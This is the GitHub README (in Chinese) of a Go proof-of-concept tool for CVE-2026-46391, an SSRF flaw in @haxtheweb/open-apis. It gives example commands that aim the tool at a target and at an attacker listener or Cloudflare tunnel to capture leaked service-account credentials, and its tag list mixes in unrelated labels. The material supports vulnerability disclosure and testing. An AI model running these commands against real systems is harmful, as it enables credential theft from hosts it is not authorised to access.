bradyjmcl/cve-2026-46391
GitHub: bradyjmcl/cve-2026-46391
针对 @haxtheweb/open-apis 中 cacheAddress 端点 SSRF 漏洞(CVE-2026-46391)的概念验证工具,可通过回调捕获服务账号凭据。
Stars: 0 | Forks: 0
# CVE-2026-46391 - 通过 @haxtheweb/open-apis 中的 SSRF 造成凭据泄露
[CVE-2026-46391](https://github.com/haxtheweb/issues/security/advisories/GHSA-4fg7-f244-3j49) 的概念验证。触发 `@haxtheweb/open-apis` 中 `cacheAddress` 端点的 SSRF 漏洞,并捕获在回调中发送的服务账号凭据。
## 用法
```
./cve-2026-46391 -u -l [-p port] [-t seconds] [-v]
```
### 选项
| 标志 | 描述 | 默认值 |
|---|---|---|
| `-u`, `--url` | 目标 Web 根目录(例如 `http://10.10.0.80:3000`) | 必填 |
| `-l`, `--listener` | 你的 IP/主机名或隧道 URL(例如 `192.168.1.10`,`https://uuid.trycloudflare.com`) | 必填 |
| `-p`, `--port` | 监听的本地端口 | `8080` |
| `-t`, `--timeout` | 等待回调的秒数 | `30` |
| `-v`, `--verbose` | 打印每个入站请求的 headers 和 body | 关闭 |
### 示例
**直连(与目标在同一网络):**
```
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201
```
**通过 VPS/Cloudflare 隧道等:**
```
./cve-2026-46391 -u http://10.10.0.80:3000 -l https://random-words.trycloudflare.com
```
**自定义端口和超时时间:**
```
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201 -p 9090 -t 60
```
## 构建
```
go build -o cve-2026-46391 .
```
## 测试
```
go test ./...
```
标签:CISA项目, Cloudflare Tunnel, CVE-2026-46391, EVTX分析, Go, Golang, HAXtheweb, Open APIs, PoC, Ruby工具, SSRF, 凭据泄露, 回调漏洞, 安全漏洞, 安全编程, 日志审计, 暴力破解, 服务端请求伪造, 网络安全, 隐私保护